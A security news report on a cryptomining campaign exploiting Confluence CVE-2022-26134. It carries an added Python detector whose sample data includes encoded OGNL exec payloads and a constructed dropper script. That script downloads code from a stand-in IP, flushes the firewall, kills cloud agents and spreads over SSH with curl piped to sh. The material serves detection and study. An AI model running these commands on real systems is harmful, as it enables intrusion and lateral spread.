Threat actors are targeting unpatched Atlassian Confluence servers as part of an ongoing cryptomining campaign.
Trend Micro researchers warn of an ongoing cryptomining campaign targeting Atlassian Confluence servers affected by the CVE-2022-26134 vulnerability.
The now-patched critical security flaw was disclosed by Atlassian in early June; at the time, the company warned of a critical unpatched remote code execution vulnerability affecting all supported versions of Confluence Server and Data Center that was being actively exploited in attacks in the wild.
“We observed the active exploitation of CVE-2022-26134, an unauthenticated remote code execution (RCE) vulnerability with a critical rating of 9.8 in the collaboration tool Atlassian Confluence. The gap is being abused for malicious cryptocurrency mining.” reads the post published by Trend Micro. “If left unremedied and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as a complete domain takeover of the infrastructure and the deployment of information stealers, remote access trojans (RATs), and ransomware.”
In one of the attacks observed by the experts, threat actors exploited the flaw to inject an OGNL expression that downloaded and ran a shell script (“ro.sh”) on the victim’s machine. That script was then used to fetch a second shell script (“ap.sh”).
The ap.sh shell script was used to perform several actions, including updating the PATH variable to include the /tmp and /dev/shm paths, downloading the curl utility, disabling iptables or changing the firewall policy action to ACCEPT, and flushing all firewall rules.
The script also downloads a binary file named ko, which exploits the PwnKit vulnerability (CVE-2021-4034 in polkit’s pkexec) to escalate privileges to the root user; the binary in turn downloads the ap.sh shell script for the next actions.
The last stage of the attack chain consists of downloading the hezb malware and killing processes associated with other competing coin miners.
The shell script also disables cloud service provider agents from Alibaba and Tencent, then performs lateral movement via SSH.
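The attack chain described above lends itself to two practical checks: searching web-server access logs for the OGNL expression the exploit places in the request path, and flagging the post-exploitation behaviours of a fetched shell script (PATH tampering, firewall flush, cloud-agent shutdown, miner killing, SSH fan-out). The following Python is an added example, not code from the Trend Micro report or the SecurityAffairs article. The access-log lines and the scripts it scans are constructed samples, and the cloud-agent and miner process names in the regexes are assumptions used for illustration rather than indicators taken from the report.

```python
"""Heuristic checks for the CVE-2022-26134 exploitation chain described above.

Added example; not code from the Trend Micro report. Sample data is constructed.
"""
import re
from urllib.parse import unquote

# Assumed access-log shape: client - - [ts] "METHOD /target HTTP/1.1" status size
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def _fully_decode(s, rounds=3):
    """Undo repeated percent-encoding; attackers double-encode to dodge naive filters."""
    for _ in range(rounds):
        new = unquote(s)
        if new == s:
            break
        s = new
    return s


def find_ognl_injection(log_lines):
    """Return (client_ip, decoded_target, status) for requests whose target
    carries an OGNL expression, i.e. `${ ... }` after decoding. Only the web
    tier's own log is inspected; a proxy that normalises paths may hide this."""
    hits = []
    for line in log_lines:
        m = _REQ_RE.search(line)
        if not m:
            continue
        decoded = _fully_decode(m.group("path"))
        if "${" in decoded and "}" in decoded:
            hits.append((line.split(" ", 1)[0], decoded, int(m.group("status"))))
    return hits


# Behaviour signatures for the ap.sh stage. Agent/miner names are assumptions.
_SCRIPT_SIGS = {
    "path_tampering":   re.compile(r"PATH=.*(/tmp|/dev/shm)"),
    "fetch_tool":       re.compile(r"\b(curl|wget)\b.*https?://"),
    "firewall_disable": re.compile(r"iptables\s+(-F|--flush|-P\s+\w+\s+ACCEPT)|(systemctl\s+stop|service)\s+.*(iptables|firewalld)"),
    "cloud_agent_kill": re.compile(r"(systemctl\s+stop|service\s+\S+\s+stop|pkill|kill).*(aliyun|AliYunDun|YunJing|tencent|barad)", re.I),
    "miner_kill":       re.compile(r"(pkill|killall|kill\s+-9).*(xmrig|kinsing|kdevtmpfsi|minerd)", re.I),
    "ssh_lateral":      re.compile(r"\bssh\b.*(StrictHostKeyChecking=no|BatchMode=yes)"),
}


def audit_shell_script(script_text):
    """Return the set of signature names that match at least one line of the script."""
    hits = set()
    for line in script_text.splitlines():
        for name, rx in _SCRIPT_SIGS.items():
            if rx.search(line):
                hits.add(name)
    return hits


def is_suspicious(hits):
    """A bare download is informational; anything else in the set is a verdict."""
    return bool(hits - {"fetch_tool"})


# Constructed samples: one single-encoded and one double-encoded exploit request
# from the same client, plus benign traffic.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [08/Jun/2022:10:01:22 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1" 302 0',
    '198.51.100.7 - - [08/Jun/2022:10:01:30 +0000] "GET /login.action HTTP/1.1" 200 5123',
    '203.0.113.5 - - [08/Jun/2022:10:02:01 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522id%2522%2529%257D/ HTTP/1.1" 302 0',
    '192.0.2.9 - - [08/Jun/2022:10:03:00 +0000] "GET /display/FIN/Q2%20$%20report HTTP/1.1" 200 7710',
]

# Constructed script mimicking the ap.sh behaviours listed in the article.
SAMPLE_AP_SH = """#!/bin/sh
export PATH=$PATH:/tmp:/dev/shm
curl -fsSL http://198.51.100.20/ko -o /tmp/ko
iptables -P INPUT ACCEPT
iptables -F
systemctl stop aliyun.service
pkill -f xmrig
for h in $(cut -d' ' -f1 ~/.ssh/known_hosts); do ssh -oStrictHostKeyChecking=no $h 'curl http://198.51.100.20/ap.sh | sh'; done
"""

BENIGN_SH = """#!/bin/sh
export PATH=$PATH:/usr/local/bin
curl -fsSL https://example.com/health
"""

if __name__ == "__main__":
    for ip, target, status in find_ognl_injection(SAMPLE_ACCESS_LOG):
        print(f"OGNL in request from {ip} (status {status}): {target}")
    print("ap.sh:", sorted(audit_shell_script(SAMPLE_AP_SH)), is_suspicious(audit_shell_script(SAMPLE_AP_SH)))
    print("benign:", sorted(audit_shell_script(BENIGN_SH)), is_suspicious(audit_shell_script(BENIGN_SH)))
```

The log check decodes the request target several times before looking for `${`, because a single `unquote` misses the double-encoded variant. The script audit is deliberately behaviour-based rather than hash-based: the dropper names (ro.sh, ap.sh, ko, hezb) change between campaigns, while disabling the firewall and the cloud agents is what the next campaign will also need to do. Neither check substitutes for patching Confluence and polkit.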
“Although we have observed the abuse of this vulnerability for illicit cryptocurrency-mining activities by cybercriminals, we also urge users to prioritize patching this gap as soon as possible since it is fairly simple to exploit it for other subsequent compromises.” concludes the report. “Attackers could take advantage of injecting their own code for interpretation and gain access to the Confluence domain being targeted, as well as conduct attacks ranging from controlling the server for subsequent malicious activities to damaging the infrastructure itself.”
(SecurityAffairs – hacking, Atlassian Confluence)